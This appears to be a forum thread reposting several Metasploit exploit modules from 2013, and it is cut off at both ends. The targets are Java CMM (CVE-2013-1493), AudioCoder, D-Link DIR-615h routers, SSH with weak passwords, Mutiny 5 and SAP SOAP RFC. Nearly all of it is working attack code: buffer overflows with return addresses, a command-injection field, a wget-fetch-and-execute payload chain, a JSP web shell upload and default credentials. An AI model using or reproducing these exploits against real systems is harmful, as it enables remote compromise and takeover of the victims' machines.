    if datastore['SOURCEIP']
      ip_length = datastore['SOURCEIP'].length
    else
      ip_length = Rex::Socket.source_address(rhost).length
    end
    buf = rand_text(target['Offset'] - ip_length)
    buf << [ target['Ret'] ].pack('V')
    buf << rand_text(16)
    buf << payload.encoded
    send_cmd( ['LIST', buf], false )
    disconnect
  end
 
end

 

[DarckSol]

Java CMM Remote Code Execution

This Metasploit module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn't bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )

    super( update_info( info,
      'Name'          => 'Java CMM Remote Code Execution',
      'Description'   => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'    =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'      => [ 'win', 'java' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end


  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end

  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end

 

[DarckSol]

This Metasploit module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. This Metasploit module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AudioCoder .M3U Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability
        occurs when adding an .m3u, allowing arbitrary code execution with the privileges
        of the user running AudioCoder. This module has been tested successfully on
        AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '92939' ],
          [ 'EDB', '25141' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'           => 6596,
          'BadChars'        => "\x00\x5c\x40\x0d\x0a",
          'DisableNops'     => true,
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [ 'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'     => 0x66011b56, # ppr from libiconv-2.dll
              'Offset'  => 765
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'May 01 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
      ], self.class)

  end

  def exploit
    buffer = "http://"
    buffer << rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded

    file_create(buffer)
  end
end

 

[DarckSol]

D-Link DIR615h OS Command Injection Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DIR615h OS Command Injection',
      'Description' => %q{
          Some D-Link Routers are vulnerable to an authenticated OS command injection on
        their web interface, where default credentials are admin/admin or admin/password.
        Since it is a blind os command injection vulnerability, there is no output for the
        executed command when using the cmd generic payload. This module was tested against
        a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a
        controlled system could be used for testing purposes. The exploit uses the wget
        client from the device to convert the command injection into an arbitrary payload
        execution.
      },
      'Author'      =>
        [
          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez' # minor help with msf module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'BID', '57882' ],
          [ 'EDB', '24477' ],
          [ 'OSVDB', '90174' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-008' ]
        ],
      'DisclosureDate' => 'Feb 07 2013',
      'Privileged'     => true,
      'Platform'       => ['linux','unix'],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'CMD',
            {
            'Arch' => ARCH_CMD,
            'Platform' => 'unix'
            }
          ],
          [ 'Linux mipsel Payload',
            {
            'Arch' => ARCH_MIPSLE,
            'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'  => 1,
      ))
 
    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
      ], self.class)
  end
 
 
  def request(cmd)
    begin
      res = send_request_cgi({
        'uri'    => @uri,
        'method' => 'GET',
        'vars_get' => {
          "page" => "tools_vct",
          "hping" => "0",
          "ping_ipaddr" => "1.1.1.1`#{cmd}`",
          "ping6_ipaddr" => ""
        }
      })
      return res
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end
  end
 
  def exploit
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
    @uri = '/tools_vct.htm'
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    @timeout = 5
 
    #
    # testing Login
    #
    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
    begin
      res= send_request_cgi({
        'uri' => '/login.htm',
        'method' => 'POST',
        'vars_post' => {
          "page" => "login",
          "submitType" => "0",
          "identifier" => "",
          "sel_userid" => user,
          "userid" => "",
          "passwd" => pass,
          "captchapwd" => ""
        }
      })
      if res.nil? or res.code == 404
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
      if res.body =~ /\<script\ langauge\=\"javascript\"\>showMainTabs\(\"setup\"\)\;\<\/script\>/
        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
      else
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
    end
 
    if target.name =~ /CMD/
      if not (datastore['CMD'])
        fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
      end
      cmd = payload.encoded
      res = request(cmd)
      if (!res)
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
      else
        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
      end
      return
    end
 
    #thx to Juan for his awesome work on the mipsel elf support
    @pl = generate_payload_exe
    @elf_sent = false
 
    #
    # start our server
    #
    resource_uri = '/' + downfile
 
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
      #do not use SSL
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end
 
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
      else
        srv_host = datastore['SRVHOST']
      end
 
      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
      start_service({'Uri' => {
        'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
      }})
 
      datastore['SSL'] = true if ssl_restore
    end
 
    #
    # download payload
    #
    print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
    #this filename is used to store the payload on the device
    filename = rand_text_alpha_lower(8)
 
    #not working if we send all command together -> lets take three requests
    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
 
    # wait for payload download
    if (datastore['DOWNHOST'])
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
      select(nil, nil, nil, datastore['HTTP_DELAY'])
    else
      wait_linux_payload
    end
    register_file_for_cleanup("/tmp/#{filename}")
 
    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
    select(nil, nil, nil, @timeout)
 
    #
    # chmod
    #
    cmd = "chmod 777 /tmp/#{filename}"
    print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
    select(nil, nil, nil, @timeout)
 
    #
    # execute
    #
    cmd = "/tmp/#{filename}"
    print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
 
  end
 
  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    #print_status("on_request_uri called: #{request.inspect}")
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end
 
  # wait for the data to be sent
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
 
    waited = 0
    while (not @elf_sent)
      select(nil, nil, nil, 1)
      waited += 1
      if (waited > datastore['HTTP_DELAY'])
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
      end
    end
  end
 
end
 
# 0756854B667574C0   1337day.com [2013-05-21]   3BF53F149F70AD42 #

Добавлено в [time]1369129962[/time]
SSH User Code Execution Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
require 'net/ssh'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking
 
  include Msf::Exploit::CmdStagerBourne
 
  attr_accessor :ssh_socket
 
  def initialize
    super(
      'Name'        => 'SSH User Code Execution',
      'Description' => %q{
        This module utilizes a stager to upload a base64 encoded
        binary which is then decoded, chmod'ed and executed from
        the command shell.
      },
      'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
      'References'  =>
        [
          [ 'CVE', '1999-0502'] # Weak password
        ],
      'License'     => MSF_LICENSE,
      'Privileged'  => true,
      'DefaultOptions' =>
        {
          'PrependFork' => 'true',
          'EXITFUNC' => 'process'
        },
      'Payload'     =>
        {
          'Space'    => 4096,
          'BadChars' => "",
          'DisableNops' => true
        },
      'Platform'    => [ 'osx', 'linux' ],
      'Targets'     =>
        [
          [ 'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            },
          ],
          [ 'Linux x64',
            {
              'Arch' => ARCH_X86_64,
              'Platform' => 'linux'
            },
          ],
          [ 'OSX x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'osx'
            },
          ],
        ],
      'DefaultTarget'  => 0,
      # For the CVE
      'DisclosureDate' => 'Jan 01 1999'
    )
 
    register_options(
      [
        OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
        OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
        OptString.new('RHOST', [ true, "The target address" ]),
        Opt::RPORT(22)
      ], self.class
    )
 
    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
      ]
    )
  end
 
  def execute_command(cmd, opts = {})
    begin
      Timeout.timeout(3) do
        self.ssh_socket.exec!("#{cmd}\n")
      end
    rescue ::Exception
    end
  end
 
  def do_login(ip, user, pass, port)
    opt_hash = {
      :auth_methods  => ['password', 'keyboard-interactive'],
      :msframework   => framework,
      :msfmodule     => self,
      :port          => port,
      :disable_agent => true,
      :password      => pass
    }
 
    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
 
    begin
      self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
    rescue Rex::ConnectionError, Rex::AddressInUse
      fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')
    rescue Net::SSH::Disconnect, ::EOFError
      fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')
    rescue Net::SSH::AuthenticationFailed
      fail_with(Exploit::Failure::NoAccess, 'Failed authentication')
    rescue Net::SSH::Exception => e
      fail_with(Exploit::Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
    end
 
    if not self.ssh_socket
      fail_with(Exploit::Failure::Unknown)
    end
    return
  end
 
  def exploit
    do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
 
    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
    execute_cmdstager({:linemax => 500})
  end
end
 
# D932E464DB4A4BEF   1337day.com [2013-05-21]   436FADEA70C154C2 #

Добавлено в [time]1369130015[/time]
Mutiny 5 Arbitrary File Upload Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Mutiny 5 Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in the Mutiny 5 appliance. The
EditDocument servlet provides a file upload function to authenticated users. A
directory traversal vulnerability in the same functionality allows for arbitrary
file upload, which results in arbitrary code execution with root privileges. In
order to exploit the vulnerability a valid user (any role) in the web frontend is
required. The module has been tested successfully on the Mutiny 5.0-1.07 appliance.
},
'Author' =>
[
'juan vazquez' # Metasploit module and initial discovery
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-0136' ],
[ 'US-CERT-VU', '701572' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ]
],
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Mutiny 5.0-1.07 Appliance (Linux)', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 15 2013'))

register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Path to Mutiny Web Service', '/']),
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'superadmin@mutiny.com' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'password' ])
], self.class)
end

def upload_file(location, filename, contents)
post_data = Rex::MIME::Message.new
post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{filename}\"")
post_data.add_part("../../../..#{location}", nil, nil, "form-data; name=\"uploadPath\"")

# Work around an incompatible MIME implementation
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "interface","EditDocument"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "JSESSIONID=#{@session}"
})

if res and res.code == 200 and res.body =~ /\{"success"rue\}/
return true
else
return false
end
end

def login

res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "interface", "index.do"),
'method' => 'GET'
})

if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
first_session = $1
end

res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "interface", "j_security_check"),
'method' => 'POST',
'cookie' => "JSESSIONID=#{first_session}",
'vars_post' => {
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD']
}
})

if res.nil? or res.code != 302 or res.headers['Location'] !~ /interface\/index.do/
return false
end

res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "interface", "index.do"),
'method' => 'GET',
'cookie' => "JSESSIONID=#{first_session}"
})

if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
@session = $1
return true
end

return false
end

def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "interface", "/"),
})

if res and res.body =~ /var currentMutinyVersion = "Version ([0-9\.-]*)/
version = $1
end

if version and version >= "5" and version <= "5.0-1.07"
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end

def exploit
@peer = "#{rhost}:#{rport}"

print_status("#{@peer} - Trying to login")
if login
print_good("#{@peer} - Login successful")
else
fail_with(Exploit::Failure::NoAccess, "#{@peer} - Login failed, review USERNAME and PASSWORD options")
end

exploit_native
end

def exploit_native
print_status("#{@peer} - Uploading executable Payload file")
elf = payload.encoded_exe
elf_location = "/tmp"
elf_filename = "#{rand_text_alpha_lower(8)}.elf"
if upload_file(elf_location, elf_filename, elf)
register_files_for_cleanup("#{elf_location}/#{elf_filename}")
f = ::File.open("/tmp/test.elf", "wb")
f.write(elf)
f.close
else
fail_with(Exploit::Failure::Unknown, "#{@peer} - Payload upload failed")
end

print_status("#{@peer} - Uploading JSP to execute the payload")
jsp = jsp_execute_command("#{elf_location}/#{elf_filename}")
jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m"
jsp_filename = "#{rand_text_alpha_lower(8)}.jsp"
if upload_file(jsp_location, jsp_filename, jsp)
register_files_for_cleanup("#{jsp_location}/#{jsp_filename}")
else
fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP upload failed")
end

print_status("#{@peer} - Executing payload")
send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "m", jsp_filename),
'method' => 'GET'
})

end

def jsp_execute_command(command)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|try {\n|
jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
jspraw << %Q|} catch (IOException ioe) { }\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|

jspraw
end

end

# 81F988DD824D3513 1337day.com [2013-05-21] 4D052AE0A0C0FF1C #

Добавлено в [time]1369130096[/time]
SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
##
# This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php.
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy.
#
# The following guys from ERP-SCAN deserve credit for their contributions -
# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
# Dmitry Evdokimov.
#
# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
# who have Beta tested the modules and provided excellent feedback. Some people
# just seem to enjoy hacking SAP :)
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
 
  Rank = GreatRanking
 
  include Msf::Exploit::CmdStagerVBS
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
 
  def initialize
    super(
      'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution',
      'Description' => %q{
          This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP
        RFC Service, to execute remote commands. This module needs SAP credentials with
        privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested
        successfully on Windows 2008 64 bits and Linux 64 bits platforms.
      },
      'References' =>
        [
          [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
        ],
      'DisclosureDate' => 'Mar 26 2013',
      'Platform'       => ['win', 'unix'],
      'Targets' => [
        [ 'Linux',
          {
            'Arch'     => ARCH_CMD,
            'Platform' => 'unix'
            #'Payload'  =>
              #{
                #'DisableNops' => true,
                #'Space'       => 232,
                #'Compat'      =>
                  #{
                    #'PayloadType' => 'cmd',
                    #'RequiredCmd' => 'perl ruby',
                  #}
              #}
          }
        ],
        [ 'Windows x64',
          {
            'Arch' => ARCH_X86_64,
            'Platform' => 'win'
          }
        ]
      ],
      'DefaultTarget' => 0,
      'Privileged' => false,
      'Author' =>
        [
          'nmonkee'
        ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('CLIENT', [true, 'SAP Client', '001']),
        OptString.new('USERNAME', [true, 'Username', 'SAP*']),
        OptString.new('PASSWORD', [true, 'Password', '06071992'])
      ], self.class)
    register_advanced_options(
      [
        OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
      ], self.class)
  end
 
  def send_soap_request(data)
    res = send_request_cgi({
      'uri' => '/sap/bc/soap/rfc',
      'method' => 'POST',
      'data' => data,
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
      'ctype' => 'text/xml; charset=UTF-8',
      'headers' => {
        'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
      },
      'vars_get' => {
        'sap-client' => datastore['CLIENT'],
        'sap-language' => 'EN'
      }
    })
    return res
  end
 
  def build_soap_request(command, sap_command, sap_os)
    data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>"
    data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">"
    data << "<env:Body>"
    data << "<n1:SXPG_CALL_SYSTEM xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
    data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>"
    data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>"
    data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>"
    data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>"
    data << "</n1:SXPG_CALL_SYSTEM>"
    data << "</env:Body>"
    data << "</env:Envelope>"
    return data
  end
 
  def check
    data = rand_text_alphanumeric(4 + rand(4))
    res = send_soap_request(data)
    if res and res.code == 500 and res.body =~ /faultstring/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end
 
  def exploit
    if target.name =~ /Windows/
      linemax = datastore['PAYLOAD_SPLIT']
      vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
      print_status("#{rhost}:#{rport} - Sending SOAP SXPG_CALL_SYSTEM request")
      execute_cmdstager({ :delay => 0.35, :linemax => linemax })
    elsif target.name =~ /Linux/
      file = rand_text_alphanumeric(5)
      stage_one = create_unix_payload(1,file)
      print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
      res = send_soap_request(stage_one)
      if res and res.code == 200 and res.body =~ /External program terminated/
        print_good("#{rhost}:#{rport} - Payload dump was successful")
      else
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
      end
      stage_two = create_unix_payload(2,file)
      print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
      send_soap_request(stage_two)
    end
  end
 
  def create_unix_payload(stage, file)
    command = ""
    if target.name =~ /Linux/
      if stage == 1
        my_payload = payload.encoded.gsub(" ","\t")
        my_payload.gsub!("&","&")
        my_payload.gsub!("<","<")
        command = "-o /tmp/" + file + " -n pwnie" + "\n!"
        command << my_payload
        command << "\n"
      elsif stage == 2
        command = "-ic /tmp/" + file
      end
 
    end
 
    return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
  end
 
  def execute_command(cmd, opts)
    command = cmd.gsub(/&/, "&")
    command.gsub!(/%TEMP%\\/, "")
    data = build_soap_request("&#{command}", "LIST_DB2DUMP", "ANYOS")
    begin
      res = send_soap_request(data)
      if res and res.code == 200
        return
      else
        if res and res.body =~ /faultstring/
          error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
          0.upto(error.length-1) do |i|
            vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
          end
        end
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
    end
  end
end
 
# 73A0DF23273FDC8A   1337day.com [2013-05-21]   B2584A0BBA5DC612 #

SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
##
# This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php.
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy.
#
# The following guys from ERP-SCAN deserve credit for their contributions -
